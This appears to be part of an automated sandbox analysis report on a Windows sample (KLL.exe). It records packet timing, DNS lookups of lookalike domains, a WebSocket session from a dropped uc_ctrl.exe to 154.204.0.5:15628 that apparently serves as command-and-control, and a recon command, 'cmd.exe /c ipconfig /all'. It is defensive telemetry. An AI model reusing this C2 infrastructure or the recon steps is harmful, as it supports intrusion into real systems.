Jul 20, 2024 16:31:58.354055882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.359144926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.359199047 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.364265919 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.364310980 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.369597912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.369668961 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.374541044 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.374592066 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.379595041 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.379647017 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.384634018 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.384697914 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.389583111 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.389760971 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.394787073 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.394860983 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.399746895 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.400000095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.404989958 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.405150890 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.410110950 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.410165071 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.415307999 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.415371895 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.420439005 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.420520067 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.425426960 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.425529957 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.430543900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.430603981 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.435578108 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.435704947 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.440531015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.440701008 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.445653915 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.445713043 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.450684071 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.450800896 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.455705881 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.455847025 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.460756063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.460812092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.465791941 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.465960979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.470932961 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.470987082 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.476295948 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.476587057 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.481607914 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.481821060 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.486718893 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.486780882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.491693020 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.491924047 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.496998072 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.497466087 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.502783060 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.502906084 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.507920027 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.507973909 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.513351917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.513463974 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.518630981 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.521694899 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.526752949 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.529747009 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.535005093 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.537870884 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.542865038 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.544701099 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.550507069 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.553721905 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.558743000 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.560003996 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.565022945 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.565224886 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.570183039 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.572107077 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.577066898 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.577471018 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.582529068 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.583744049 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.588686943 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.588875055 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.593812943 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.595691919 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.600709915 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.600986958 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.606096983 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.607826948 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.612921953 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.613188028 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.618366957 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.619671106 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.624618053 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.624763012 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.629908085 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.631752968 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.653621912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.656049967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.661359072 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.662256956 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.668309927 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.673664093 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.685678005 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.688735962 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.702927113 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.703697920 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.709039927 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.709229946 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.719913006 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:58.721699953 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:58.726950884 CEST	15628	49722	154.204.0.5	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 20, 2024 16:30:40.293292999 CEST	192.168.2.6	1.1.1.1	0x77db	Standard query (0)	in.appcenter.ms	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:40.619647026 CEST	192.168.2.6	1.1.1.1	0x4f3a	Standard query (0)	ws-ap1.pusher.com	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.416615963 CEST	192.168.2.6	1.1.1.1	0xa1ad	Standard query (0)	www.baidu.com	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.417421103 CEST	192.168.2.6	1.1.1.1	0x1322	Standard query (0)	www.yandex.com	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.418618917 CEST	192.168.2.6	1.1.1.1	0xf910	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.640475035 CEST	192.168.2.6	8.8.8.8	0x871c	Standard query (0)	nal.fqoqehwib.com	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.640758038 CEST	192.168.2.6	8.8.8.8	0xb29e	Standard query (0)	nit.crash1ytics.com	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.641040087 CEST	192.168.2.6	8.8.8.8	0xa3a9	Standard query (0)	chr.alipayassets.com	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.666897058 CEST	192.168.2.6	1.1.1.1	0x8995	Standard query (0)	d1dmgcawtbm6l9.cloudfront.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 20, 2024 16:30:40.303087950 CEST	1.1.1.1	192.168.2.6	0x77db	No error (0)	in.appcenter.ms	in-prod-pme-eastus2-ingestion-66ddb56a.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 20, 2024 16:30:40.627994061 CEST	1.1.1.1	192.168.2.6	0x4f3a	No error (0)	ws-ap1.pusher.com	socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 20, 2024 16:30:40.627994061 CEST	1.1.1.1	192.168.2.6	0x4f3a	No error (0)	socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com		54.251.31.103	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:40.627994061 CEST	1.1.1.1	192.168.2.6	0x4f3a	No error (0)	socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com		18.136.49.83	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:40.627994061 CEST	1.1.1.1	192.168.2.6	0x4f3a	No error (0)	socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com		54.251.150.118	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.423615932 CEST	1.1.1.1	192.168.2.6	0xa1ad	No error (0)	www.baidu.com	www.a.shifen.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 20, 2024 16:30:41.423615932 CEST	1.1.1.1	192.168.2.6	0xa1ad	No error (0)	www.a.shifen.com	www.wshifen.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 20, 2024 16:30:41.423615932 CEST	1.1.1.1	192.168.2.6	0xa1ad	No error (0)	www.wshifen.com		103.235.47.188	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.423615932 CEST	1.1.1.1	192.168.2.6	0xa1ad	No error (0)	www.wshifen.com		103.235.46.96	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.425292015 CEST	1.1.1.1	192.168.2.6	0x1322	No error (0)	www.yandex.com	yandex.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 20, 2024 16:30:41.425292015 CEST	1.1.1.1	192.168.2.6	0x1322	No error (0)	yandex.com		77.88.55.88	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.425292015 CEST	1.1.1.1	192.168.2.6	0x1322	No error (0)	yandex.com		77.88.44.55	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.425292015 CEST	1.1.1.1	192.168.2.6	0x1322	No error (0)	yandex.com		5.255.255.77	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.426347971 CEST	1.1.1.1	192.168.2.6	0xf910	No error (0)	www.google.com		142.250.186.132	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.679519892 CEST	1.1.1.1	192.168.2.6	0x8995	No error (0)	d1dmgcawtbm6l9.cloudfront.net		108.138.187.72	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.679519892 CEST	1.1.1.1	192.168.2.6	0x8995	No error (0)	d1dmgcawtbm6l9.cloudfront.net		108.138.187.229	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.679519892 CEST	1.1.1.1	192.168.2.6	0x8995	No error (0)	d1dmgcawtbm6l9.cloudfront.net		108.138.187.171	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.679519892 CEST	1.1.1.1	192.168.2.6	0x8995	No error (0)	d1dmgcawtbm6l9.cloudfront.net		108.138.187.123	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.873960018 CEST	8.8.8.8	192.168.2.6	0xb29e	No error (0)	nit.crash1ytics.com		223.61.70.52	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.873960018 CEST	8.8.8.8	192.168.2.6	0xb29e	No error (0)	nit.crash1ytics.com		142.242.204.31	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.873960018 CEST	8.8.8.8	192.168.2.6	0xb29e	No error (0)	nit.crash1ytics.com		19.88.16.251	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.873960018 CEST	8.8.8.8	192.168.2.6	0xb29e	No error (0)	nit.crash1ytics.com		67.137.174.254	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.874284983 CEST	8.8.8.8	192.168.2.6	0xa3a9	No error (0)	chr.alipayassets.com		85.222.79.57	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.874284983 CEST	8.8.8.8	192.168.2.6	0xa3a9	No error (0)	chr.alipayassets.com		222.91.58.119	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.874284983 CEST	8.8.8.8	192.168.2.6	0xa3a9	No error (0)	chr.alipayassets.com		12.206.118.229	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.883985996 CEST	8.8.8.8	192.168.2.6	0x871c	No error (0)	nal.fqoqehwib.com		99.34.124.121	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.883985996 CEST	8.8.8.8	192.168.2.6	0x871c	No error (0)	nal.fqoqehwib.com		10.176.38.125	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.883985996 CEST	8.8.8.8	192.168.2.6	0x871c	No error (0)	nal.fqoqehwib.com		33.86.72.19	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.883985996 CEST	8.8.8.8	192.168.2.6	0x871c	No error (0)	nal.fqoqehwib.com		5.217.108.181	A (IP address)	IN (0x0001)	false
Jul 20, 2024 16:30:41.883985996 CEST	8.8.8.8	192.168.2.6	0x871c	No error (0)	nal.fqoqehwib.com		104.112.172.245	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49722	154.204.0.5	15628	7340	C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe

Timestamp	Bytes transferred	Direction	Data
Jul 20, 2024 16:30:03.530131102 CEST	228	OUT	GET /\ HTTP/1.1 Connection: Upgrade Sec-WebSocket-Key: ECfGmCmRKiTGhHoKmDyBQIhCK Sec-WebSocket-Version: 13 Upgrade: websocket Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits Host: 154.204.0.5:15628
Jul 20, 2024 16:30:04.470690966 CEST	148	IN	HTTP/1.1 101 Switching Protocols Connection: Upgrade Upgrade: WebSocket Sec-WebSocket-Accept: 729IwXLUtDMChmyPsVi/LcO0J7Q= Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49728	54.251.31.103	80	4892	C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe

Timestamp	Bytes transferred	Direction	Data
Jul 20, 2024 16:30:40.657933950 CEST	265	OUT	GET /app/4fc436ef36f4026102d7?protocol=5&client=pusher-dotnet-client&version=1.1.2 HTTP/1.1 Host: ws-ap1.pusher.com Upgrade: websocket Connection: Upgrade Sec-WebSocket-Version: 13 Sec-WebSocket-Key: YTJjMDBlYTQtMmY1MC00ZQ== Origin: ws://ws-ap1.pusher.com
Jul 20, 2024 16:30:41.553747892 CEST	166	IN	HTTP/1.1 101 Switching Protocols Date: Sat, 20 Jul 2024 14:30:41 GMT Connection: upgrade Upgrade: websocket Sec-WebSocket-Accept: TxDOJCpx4afoxu84VRq/2jVSusg=
Jul 20, 2024 16:30:42.254590988 CEST	242	IN	Data Raw: 81 7e 00 92 7b 22 65 76 65 6e 74 22 3a 22 70 75 73 68 65 72 3a 65 72 72 6f 72 22 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 34 30 30 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 41 70 70 20 6b 65 79 20 34 66 63 34 33 36 65 66 33 36 66 34 30 32 36 Data Ascii: ~{"event":"pusher:error","data":{"code":4001,"message":"App key 4fc436ef36f4026102d7 not in this cluster. Did you forget to specify the cluster?"}}ZApp key 4fc436ef36f4026102d7 not in this cluster. Did you forget to specify the cluster?
Jul 20, 2024 16:30:42.305309057 CEST	8	OUT	Data Raw: 88 82 53 39 72 64 50 d1 Data Ascii: S9rdP

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49734	108.138.187.72	443	4892	C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-20 14:30:42 UTC	183	OUT	GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=chr.alipayassets.com.&type=1 HTTP/1.1 Host: d1dmgcawtbm6l9.cloudfront.net User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2024-07-20 14:30:43 UTC	676	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=UTF-8 Transfer-Encoding: chunked Connection: close Server: nginx/1.16.0 Date: Sat, 20 Jul 2024 14:30:43 GMT X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Expires: Sat, 20 Jul 2024 14:30:43 GMT Cache-Control: private, max-age=6 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Accept-Ranges: none Vary: Accept-Encoding X-Cache: Miss from cloudfront Via: 1.1 8d95ccdbeafebd6354ea5909e8b40a9e.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MXP64-P1 X-Amz-Cf-Id: 7sMTJDZPNz01MYS_VBet7tK2cPfwETysVnJUH3tzBk_BrX20Lko0Tw==
2024-07-20 14:30:43 UTC	429	IN	Data Raw: 31 61 36 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 63 68 72 2e 61 6c 69 70 61 79 61 73 73 65 74 73 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 63 68 72 2e 61 6c 69 70 61 79 61 73 73 65 74 73 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 36 2c 22 64 61 74 61 22 3a 22 38 35 2e 32 32 32 2e 37 39 2e 35 37 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 63 68 72 2e 61 6c 69 70 61 79 61 73 73 65 74 73 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 36 Data Ascii: 1a6{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"chr.alipayassets.com.","type":1}],"Answer":[{"name":"chr.alipayassets.com.","type":1,"TTL":6,"data":"85.222.79.57"},{"name":"chr.alipayassets.com.","type":1,"TTL":6
2024-07-20 14:30:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49735	108.138.187.72	443	4892	C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-20 14:30:42 UTC	180	OUT	GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nal.fqoqehwib.com.&type=1 HTTP/1.1 Host: d1dmgcawtbm6l9.cloudfront.net User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2024-07-20 14:30:43 UTC	676	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=UTF-8 Transfer-Encoding: chunked Connection: close Server: nginx/1.16.0 Date: Sat, 20 Jul 2024 14:30:43 GMT X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Expires: Sat, 20 Jul 2024 14:30:43 GMT Cache-Control: private, max-age=2 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Accept-Ranges: none Vary: Accept-Encoding X-Cache: Miss from cloudfront Via: 1.1 61e929f79f2623281d7e3a91da354352.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MXP64-P1 X-Amz-Cf-Id: 7mif325-IPsIbzDtnvF_Vgbq3Y5FE2nEc5NupsySttG4YlrgfbVm3Q==
2024-07-20 14:30:43 UTC	518	IN	Data Raw: 31 66 66 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 6e 61 6c 2e 66 71 6f 71 65 68 77 69 62 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 6e 61 6c 2e 66 71 6f 71 65 68 77 69 62 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 32 2c 22 64 61 74 61 22 3a 22 31 30 2e 31 37 36 2e 33 38 2e 31 32 35 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 6e 61 6c 2e 66 71 6f 71 65 68 77 69 62 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 32 2c 22 64 61 74 61 22 3a Data Ascii: 1ff{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"nal.fqoqehwib.com.","type":1}],"Answer":[{"name":"nal.fqoqehwib.com.","type":1,"TTL":2,"data":"10.176.38.125"},{"name":"nal.fqoqehwib.com.","type":1,"TTL":2,"data":
2024-07-20 14:30:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49736	108.138.187.72	443	4892	C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-20 14:30:42 UTC	182	OUT	GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nit.crash1ytics.com.&type=1 HTTP/1.1 Host: d1dmgcawtbm6l9.cloudfront.net User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2024-07-20 14:30:43 UTC	676	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=UTF-8 Transfer-Encoding: chunked Connection: close Server: nginx/1.16.0 Date: Sat, 20 Jul 2024 14:30:43 GMT X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Expires: Sat, 20 Jul 2024 14:30:43 GMT Cache-Control: private, max-age=6 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Accept-Ranges: none Vary: Accept-Encoding X-Cache: Miss from cloudfront Via: 1.1 3e6bcbe331beee2f38e13259af01af8e.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MXP64-P1 X-Amz-Cf-Id: ycjhUtupT8dkBCHhupkvSQMdfevprqE3WAFpWTH_LFR8isyBFO9FoA==
2024-07-20 14:30:43 UTC	497	IN	Data Raw: 31 65 61 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 6e 69 74 2e 63 72 61 73 68 31 79 74 69 63 73 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 6e 69 74 2e 63 72 61 73 68 31 79 74 69 63 73 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 36 2c 22 64 61 74 61 22 3a 22 31 39 2e 38 38 2e 31 36 2e 32 35 31 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 6e 69 74 2e 63 72 61 73 68 31 79 74 69 63 73 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 36 2c 22 64 Data Ascii: 1ea{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"nit.crash1ytics.com.","type":1}],"Answer":[{"name":"nit.crash1ytics.com.","type":1,"TTL":6,"data":"19.88.16.251"},{"name":"nit.crash1ytics.com.","type":1,"TTL":6,"d
2024-07-20 14:30:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	10:29:41
Start date:	20/07/2024
Path:	C:\Users\user\Desktop\KLL.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\KLL.exe"
Imagebase:	0x7ff7964d0000
File size:	32'259'584 bytes
MD5 hash:	5FFEBAAB4F8218B7ABFF3A8258DBF316
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:29:43
Start date:	20/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ipconfig /all
